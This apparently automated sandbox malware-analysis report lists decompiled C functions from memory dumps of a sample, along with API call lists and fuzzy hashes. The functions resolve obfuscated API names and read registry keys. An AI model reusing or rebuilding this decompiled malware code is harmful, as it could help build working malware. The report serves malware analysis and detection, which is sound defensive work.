                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03031A57
                                                                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,03031900,?), ref: 03031A74
                                                                                                            • GetLastError.KERNEL32(?,00000001,?,?,?,03031900,?), ref: 03031A93
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 2270775618-1701360479
                                                                                                            • Opcode ID: a1ad7a452ed0e6784287bb2e614c5c6b5b972a19c5c524e60c54215312b792cf
                                                                                                            • Instruction ID: cb635c73d30c5eb52d3b7f278f7f400ac77769dce3714f45adc998d8372c09b8
                                                                                                            • Opcode Fuzzy Hash: a1ad7a452ed0e6784287bb2e614c5c6b5b972a19c5c524e60c54215312b792cf
                                                                                                            • Instruction Fuzzy Hash: D6F0227024B702AFE768FB34A8197293BADA70A302F080519F506DA1C8D778C040CF15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Allocate$Max_value
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124748770-0
                                                                                                            • Opcode ID: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction ID: 2d2eafec24b268c7fb78cba3d49179746e4d7f8ba88237a51f237343bc1dec86
                                                                                                            • Opcode Fuzzy Hash: 4d81fa068d56198766d7190474467bb0191700b91bc271ed62945861b234f042
                                                                                                            • Instruction Fuzzy Hash: 16C17272900319FFDB14DFA9D880A9FBBBAFF45254B1005AAE814D7241D771EA11CBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 03031AF6
                                                                                                            • SysAllocString.OLEAUT32(0070006F), ref: 03031B0A
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 03031B1C
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031B84
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031B93
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031B9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 344208780-0
                                                                                                            • Opcode ID: 8301f765287160ca36e42fd1a109e51a8b0621cd070dbd6003c4ab6b82e0fadc
                                                                                                            • Instruction ID: 8587fdcbf80e3e82c265f4f0bfa17f5a7f78f1e3e3983a83a9866d153d6ff3d8
                                                                                                            • Opcode Fuzzy Hash: 8301f765287160ca36e42fd1a109e51a8b0621cd070dbd6003c4ab6b82e0fadc
                                                                                                            • Instruction Fuzzy Hash: 3F417E36D01609AFDB41EFB8C844ADEB7BDAF89310F144466E910EB220EA719906CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _t23;
                                                                                                            				intOrPtr _t26;
                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                            				intOrPtr _t30;
                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                            				intOrPtr _t33;
                                                                                                            				_Unknown_base(*)()* _t35;
                                                                                                            				intOrPtr _t36;
                                                                                                            				_Unknown_base(*)()* _t38;
                                                                                                            				intOrPtr _t39;
                                                                                                            				_Unknown_base(*)()* _t41;
                                                                                                            				intOrPtr _t44;
                                                                                                            				struct HINSTANCE__* _t48;
                                                                                                            				intOrPtr _t54;
                                                                                                            
                                                                                                            				_t54 = E030375F6(0x20);
                                                                                                            				if(_t54 == 0) {
                                                                                                            					_v8 = 8;
                                                                                                            				} else {
                                                                                                            					_t23 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t1 = _t23 + 0x303e11a; // 0x4c44544e
                                                                                                            					_t48 = GetModuleHandleA(_t1);
                                                                                                            					_t26 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t2 = _t26 + 0x303e782; // 0x7243775a
                                                                                                            					_v8 = 0x7f;
                                                                                                            					_t28 = GetProcAddress(_t48, _t2);
                                                                                                            					 *(_t54 + 0xc) = _t28;
                                                                                                            					if(_t28 == 0) {
                                                                                                            						L8:
                                                                                                            						E03034AAB(_t54);
                                                                                                            					} else {
                                                                                                            						_t30 =  *0x303d2e0; // 0x22da5a8
                                                                                                            						_t5 = _t30 + 0x303e76f; // 0x614d775a
                                                                                                            						_t32 = GetProcAddress(_t48, _t5);
                                                                                                            						 *(_t54 + 0x10) = _t32;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							goto L8;
                                                                                                            						} else {
                                                                                                            							_t33 =  *0x303d2e0; // 0x22da5a8
                                                                                                            							_t7 = _t33 + 0x303e4ce; // 0x6e55775a
                                                                                                            							_t35 = GetProcAddress(_t48, _t7);
                                                                                                            							 *(_t54 + 0x14) = _t35;
                                                                                                            							if(_t35 == 0) {
                                                                                                            								goto L8;
                                                                                                            							} else {
                                                                                                            								_t36 =  *0x303d2e0; // 0x22da5a8
                                                                                                            								_t9 = _t36 + 0x303e406; // 0x4e6c7452
                                                                                                            								_t38 = GetProcAddress(_t48, _t9);
                                                                                                            								 *(_t54 + 0x18) = _t38;
                                                                                                            								if(_t38 == 0) {
                                                                                                            									goto L8;
                                                                                                            								} else {
                                                                                                            									_t39 =  *0x303d2e0; // 0x22da5a8
                                                                                                            									_t11 = _t39 + 0x303e792; // 0x6c43775a
                                                                                                            									_t41 = GetProcAddress(_t48, _t11);
                                                                                                            									 *(_t54 + 0x1c) = _t41;
                                                                                                            									if(_t41 == 0) {
                                                                                                            										goto L8;
                                                                                                            									} else {
                                                                                                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                            										_t44 = E03039269(_t54, _a8);
                                                                                                            										_v8 = _t44;
                                                                                                            										if(_t44 != 0) {
                                                                                                            											goto L8;
                                                                                                            										} else {
                                                                                                            											 *_a12 = _t54;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _v8;
                                                                                                            			}



















                                                                                                            APIs
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0303101C,?,00000001,?,?,00000000,00000000), ref: 0303485C
                                                                                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0303487E
                                                                                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 03034894
                                                                                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 030348AA
                                                                                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 030348C0
                                                                                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 030348D6
                                                                                                              • Part of subcall function 03039269: memset.NTDLL ref: 030392E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1886625739-0
                                                                                                            • Opcode ID: 1e9cfcfb8a163705c8b358db257e86d5c5f931a1eb5b0aa0fc791c40123e3a41
                                                                                                            • Instruction ID: f1596ac58c22e431e234ae13449f3c4f251c897fea412ddfcdd08a0db37728c7
                                                                                                            • Opcode Fuzzy Hash: 1e9cfcfb8a163705c8b358db257e86d5c5f931a1eb5b0aa0fc791c40123e3a41
                                                                                                            • Instruction Fuzzy Hash: 22218EB150670AEFDB60EF6AC944EABB7ECEF153407044526E545CB201E774EA05CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 6F05E172
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1DB
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1ED
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E205
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E215
                                                                                                            • _Getvals.LIBCPMT ref: 6F05E237
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568BB
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3549167292-0
                                                                                                            • Opcode ID: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction ID: 5a86d52387b51dee96900d19db61df3489acb18be70ea900e9bcc43a13234524
                                                                                                            • Opcode Fuzzy Hash: 5f1613d908a44fe4e992e088a8d658f9b532a8a3e32ba0221b3b3006dfb9b6bb
                                                                                                            • Instruction Fuzzy Hash: 51219072D00318AADF18DFE4D944BDFBBA8EF05314F10845AF9199F285EBB49650CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0655F3
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0655FD
                                                                                                            • int.LIBCPMT ref: 6F065614
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06564E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06566E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F06567B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction ID: 201d58da2ac1fc724ad4f6a899b619afd8bb750bcf199bc4360135ae88e8197d
                                                                                                            • Opcode Fuzzy Hash: 227dea0fc2bb8fb225aa1d30429c4e54ed3b876e18b471cf18234b9e7907a9a9
                                                                                                            • Instruction Fuzzy Hash: EA01F535900A29DBCF05DBB4CA40BBE77B2BF45328F640509E4116B3D1DFB0A916CB82
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065434
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06543E
                                                                                                            • int.LIBCPMT ref: 6F065455
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06548F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0654AF
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0654BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction ID: 92c9fbe0ceb0580cb492a74c56ae02fec3d5d0d8c6e9060ca89af0900dd9cfe8
                                                                                                            • Opcode Fuzzy Hash: 81d73de713980821b5fc915940440fb4e75f6c3ae378bcacba98e3cf710f8027
                                                                                                            • Instruction Fuzzy Hash: 3801F535900729DBCF05DBA8CA44BBEB7B2BF45368F240049E4106B3D2CFB4A912CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06539F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0653A9
                                                                                                            • int.LIBCPMT ref: 6F0653C0
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0653FA
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06541A
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065427
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            • Opcode ID: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction ID: 488b7b735b8239090ba841f9455642ca00d16b148e3fdf1375c6e9a5afbb71d7
                                                                                                            • Opcode Fuzzy Hash: 615741aed25f9eea7d872d28ffdb3cf8e40845b18207f1038ff2f489ef94798f
                                                                                                            • Instruction Fuzzy Hash: FA01F535904729DBCF05DBA8CA40BBEB7B2BF45728F240549E4106B2C1CFB0AE52CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 88%
                                                                                                            			E0303282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				signed int* _v16;
                                                                                                            				char _v284;
                                                                                                            				void* __esi;
                                                                                                            				char* _t59;
                                                                                                            				intOrPtr* _t60;
                                                                                                            				intOrPtr _t64;
                                                                                                            				char _t65;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				void* _t73;
                                                                                                            				signed int _t81;
                                                                                                            				void* _t91;
                                                                                                            				void* _t92;
                                                                                                            				char _t98;
                                                                                                            				signed int* _t100;
                                                                                                            				intOrPtr* _t101;
                                                                                                            				void* _t102;
                                                                                                            
                                                                                                            				_t92 = __ecx;
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				_t98 = _a16;
                                                                                                            				if(_t98 == 0) {
                                                                                                            					__imp__( &_v284,  *0x303d37c);
                                                                                                            					_t91 = 0x80000002;
                                                                                                            					L6:
                                                                                                            					_t59 = E03031922( &_v284,  &_v284);
                                                                                                            					_a8 = _t59;
                                                                                                            					if(_t59 == 0) {
                                                                                                            						_v8 = 8;
                                                                                                            						L29:
                                                                                                            						_t60 = _a20;
                                                                                                            						if(_t60 != 0) {
                                                                                                            							 *_t60 =  *_t60 + 1;
                                                                                                            						}
                                                                                                            						return _v8;
                                                                                                            					}
                                                                                                            					_t101 = _a24;
                                                                                                            					if(E03035C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                            						L27:
                                                                                                            						E03034AAB(_a8);
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					_t64 =  *0x303d2b0; // 0x5319b38
                                                                                                            					_t16 = _t64 + 0xc; // 0x5319c06
                                                                                                            					_t65 = E03031922(_t64,  *_t16);
                                                                                                            					_a24 = _t65;
                                                                                                            					if(_t65 == 0) {
                                                                                                            						L14:
                                                                                                            						_t29 = _t101 + 0x14; // 0x102
                                                                                                            						_t33 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            						if(E03034A6D(_t97,  *_t33, _t91, _a8,  *0x303d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                            							_t68 =  *0x303d2e0; // 0x22da5a8
                                                                                                            							if(_t98 == 0) {
                                                                                                            								_t35 = _t68 + 0x303ea48; // 0x4d4c4b48
                                                                                                            								_t69 = _t35;
                                                                                                            							} else {
                                                                                                            								_t34 = _t68 + 0x303ea43; // 0x55434b48
                                                                                                            								_t69 = _t34;
                                                                                                            							}
                                                                                                            							if(E03035F64(_t69,  *0x303d374,  *0x303d378,  &_a24,  &_a16) == 0) {
                                                                                                            								if(_t98 == 0) {
                                                                                                            									_t71 =  *0x303d2e0; // 0x22da5a8
                                                                                                            									_t44 = _t71 + 0x303e83e; // 0x74666f53
                                                                                                            									_t73 = E03031922(_t44, _t44);
                                                                                                            									_t99 = _t73;
                                                                                                            									if(_t73 == 0) {
                                                                                                            										_v8 = 8;
                                                                                                            									} else {
                                                                                                            										_t47 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            										E03035DDA( *_t47, _t91, _a8,  *0x303d378, _a24);
                                                                                                            										_t49 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            										E03035DDA( *_t49, _t91, _t99,  *0x303d370, _a16);
                                                                                                            										E03034AAB(_t99);
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t40 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            									E03035DDA( *_t40, _t91, _a8,  *0x303d378, _a24);
                                                                                                            									_t43 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            									E03035DDA( *_t43, _t91, _a8,  *0x303d370, _a16);
                                                                                                            								}
                                                                                                            								if( *_t101 != 0) {
                                                                                                            									E03034AAB(_a24);
                                                                                                            								} else {
                                                                                                            									 *_t101 = _a16;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            					_t21 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            					_t81 = E030363F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                            					if(_t81 == 0) {
                                                                                                            						_t100 = _v16;
                                                                                                            						if(_v12 == 0x28) {
                                                                                                            							 *_t100 =  *_t100 & _t81;
                                                                                                            							_t26 = _t101 + 0x10; // 0x3d0303c0
                                                                                                            							E03034A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                            						}
                                                                                                            						E03034AAB(_t100);
                                                                                                            						_t98 = _a16;
                                                                                                            					}
                                                                                                            					E03034AAB(_a24);
                                                                                                            					goto L14;
                                                                                                            				}
                                                                                                            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                            					goto L29;
                                                                                                            				} else {
                                                                                                            					_t97 = _a8;
                                                                                                            					E0303A938(_t98, _a8,  &_v284);
                                                                                                            					__imp__(_t102 + _t98 - 0x117,  *0x303d37c);
                                                                                                            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                            					_t91 = 0x80000003;
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}
























                                                                                                            APIs
                                                                                                            • StrChrA.SHLWAPI(03032197,0000005F,00000000,00000000,00000104), ref: 0303285E
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 0303288B
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                              • Part of subcall function 03035DDA: lstrlenW.KERNEL32(?,?,?,030329F4,3D0303C0,80000002,03032197,0303258B,74666F53,4D4C4B48,0303258B,?,3D0303C0,80000002,03032197,?), ref: 03035DFF
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 030328AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                            • String ID: ($\
                                                                                                            • API String ID: 3924217599-1512714803
                                                                                                            • Opcode ID: 0f1204eb9b366ab49ec47bfb641b921245c4ee005c4740d861b854a9391ef1a5
                                                                                                            • Instruction ID: 49002f383a76c3d1f23f97f8eecbd29038f84da86b2943f481961addd7f3718b
                                                                                                            • Opcode Fuzzy Hash: 0f1204eb9b366ab49ec47bfb641b921245c4ee005c4740d861b854a9391ef1a5
                                                                                                            • Instruction Fuzzy Hash: A7513876102A0AEFDF22EF64DC40EEA77BDFF4A200F048955FA159A160D735E925DB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                            • Opcode ID: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction ID: f12773197ed6076ee7b6929c508d3a4268f2a591e3aa1108066664ad95ec3c68
                                                                                                            • Opcode Fuzzy Hash: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction Fuzzy Hash: 6121C1B1904B52AEDB21CF74899077BBFF8AF0D204F040A1EE499C7A82D374E655CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E03034B98() {
                                                                                                            				void* _v0;
                                                                                                            				void** _t3;
                                                                                                            				void** _t5;
                                                                                                            				void** _t7;
                                                                                                            				void** _t8;
                                                                                                            				void* _t10;
                                                                                                            
                                                                                                            				_t3 =  *0x303d364; // 0x53195b0
                                                                                                            				__imp__( &(_t3[0x10]));
                                                                                                            				while(1) {
                                                                                                            					_t5 =  *0x303d364; // 0x53195b0
                                                                                                            					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                            					if( *_t1 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					Sleep(0xa);
                                                                                                            				}
                                                                                                            				_t7 =  *0x303d364; // 0x53195b0
                                                                                                            				_t10 =  *_t7;
                                                                                                            				if(_t10 != 0 && _t10 != 0x303e823) {
                                                                                                            					HeapFree( *0x303d270, 0, _t10);
                                                                                                            					_t7 =  *0x303d364; // 0x53195b0
                                                                                                            				}
                                                                                                            				 *_t7 = _v0;
                                                                                                            				_t8 =  &(_t7[0x10]);
                                                                                                            				__imp__(_t8);
                                                                                                            				return _t8;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 03034BA1
                                                                                                            • Sleep.KERNEL32(0000000A,?,03035390), ref: 03034BAB
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,03035390), ref: 03034BD9
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 03034BEE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 58946197-1536154274
                                                                                                            • Opcode ID: b04b0c889b17a88b869da4153b779fb60cd0308d5844f9125a533b7114c50fb5
                                                                                                            • Instruction ID: f7c024fca11ce8824bf68ac285c05edae402d3789bec9749056b889cfabe20f2
                                                                                                            • Opcode Fuzzy Hash: b04b0c889b17a88b869da4153b779fb60cd0308d5844f9125a533b7114c50fb5
                                                                                                            • Instruction Fuzzy Hash: 8BF0F879A07340AFEB18EF65EA99F5937ECFB46300B084409E502DB358C738EC40DA15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 597776487-0
                                                                                                            • Opcode ID: a98e9f83df23d522a4e71f08890986b03092bbc5d6636c8edf59f53ab4adb7e0
                                                                                                            • Instruction ID: 02289ff33f40289090c1b58290c6c4d0417d53395070ad23ffbfcf0b338e8d53
                                                                                                            • Opcode Fuzzy Hash: a98e9f83df23d522a4e71f08890986b03092bbc5d6636c8edf59f53ab4adb7e0
                                                                                                            • Instruction Fuzzy Hash: 81C11371A08209DFDF108F78CC40BAE7BFDAF86364F14656AD5A49B281F731AA41A750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3033488037-0
                                                                                                            • Opcode ID: 48904d907a675dae2dbeac6fcf09abc75b07d058050d980a57baada8610152bb
                                                                                                            • Instruction ID: 27195d4a6bd25ab5779c4fccc23375304620b692334907668d976880b2230131
                                                                                                            • Opcode Fuzzy Hash: 48904d907a675dae2dbeac6fcf09abc75b07d058050d980a57baada8610152bb
                                                                                                            • Instruction Fuzzy Hash: CC51F072A00705AFDB11CF69CD80BAA77F9EF48724F54556AE819DB290F731EA01DB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2020259771-0
                                                                                                            • Opcode ID: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction ID: 8bd3a21cd2ea6de165e37a24b9b0dcf162ab81b194169f2421ee1258edc51282
                                                                                                            • Opcode Fuzzy Hash: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
